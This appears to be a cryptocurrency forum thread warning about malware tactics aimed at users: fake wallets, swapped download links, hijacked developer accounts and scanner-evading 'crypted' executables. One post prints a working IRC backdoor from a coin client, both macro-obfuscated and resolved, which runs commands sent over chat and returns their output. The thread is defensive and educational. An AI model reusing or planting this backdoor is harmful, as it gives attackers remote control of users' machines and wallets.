Beware of Increasingly Sophisticated Malware Infection Attempts

[erichall]

It does seem to get worse.

But, the best thing you can do to start with in protecting your funds, is getting yourself a hardware wallet and storing tokens there. Avoid online wallets like MEW.

[jaymor11]

Malicious software   or “malware” for short   is a broad class of software built with malicious intent. To identify i will tell you how.A newbie asks for the latest wallet, or wallet that doesn’t have any TX fees, or the latest/fastest miner, and the attacker posts a program with malware embedded as a response. This type of attempt usually gets spotted pretty quickly.The attacker creates a new ANN topic and posts a malware link as the download file (or a legit one and changes it to a malware one later).The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.Those were just an examples of how they used it. So think before acting.

[sudnokpok]

Yea, be carefull what are you opening. I had problem once hardly i fixed it. This malware infections are very dangerous. Every miner should know that.

[MashaVik]

Wow! Thanks for the info! Excellent data! Carefully study this subject, and I take my notes!

[ArunV10]

Very interesting read! Thanks!

[laserfocused]

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:

Code:

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
	CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		CFree(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
	}
}

here is the source code with macros resolved:

Code:

if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
	FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		pclose(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
	}
}

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Thanks for posting this.  There is always something that we have to look out for.

[cemungut]

Information so useful that we can secure the wallet from the virus that will cause a big problem later therefore should be able to find the right solution to prevent it by making good security 

[cryptojaymark]

Thanks this was very informative. and inform to us..

[sayboo999]

Hello) At me the first purse has been cracked and now I am very cautious ... Has installed a firewall, whether it will help to protect savings ...?

[supremo666]

Thanks for the information ...
But can you please give us the exact name of the coins ... Thank you !!!

[aedankreios]

Thank you for letting us know this information it will really helps individual to secure their accounts. Just avoid the things you find suspicious.

[sudnokpok]

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.

[Legion381]

seeems very good

[tonyt25]

Wow, I am really loving this platform.☺️😂😃😁

[t25tony]

Nice 👍 job against these malwares, fell victim on a couple of occasions and it not a nice experience. Good job 👏🏼 guys

[altcoiner]

As much as we like freebies we should be careful of the application we install on our systems expecially hack copy of an application because most of the hacker want valuable information back from us which will give to them not knowing and my first BTC wallet balance was emptied because i save the private key and password on my desktop by Zbot/Zeus trojan. I learnt my lesson in hard way

[always2late]

You know im really glad that im seeing this. I lost a bunch of money when https://coinsmarkets.com went down, and I felt like an idiot. Ive been in the space too long to be making noob mistakes like leaving your coins on the exchange, but at the same time. I've also been in the space for so long that i don't trust every random developer who makes a coin. With that said I still feel dumb for my choices not because I left coins in general but because the coins that i had on the exchange were coins that i had wallets installed for

Main point for this post is that were getting to the point where for those of us who really understand whats going on but arent software devs ourselves its scary AF to get into any of these non major platforms

[zmeddy]

Omg, thanks for the information, I'm always very afraid of losing my data or getting a virus, just cured the computer from a miner who was almost six months mining on my computer ((

[alex massi]

Thanks that is realy serious i mean coping links would do that we all should be careful

[sudnokpok]

in my case, IE11 was completely locked up and I had to be fast with the "end process" clicks. I've never had my browser hijacked like this. That is unless we count AMD's user surveys they keep imposing on us after a driver install.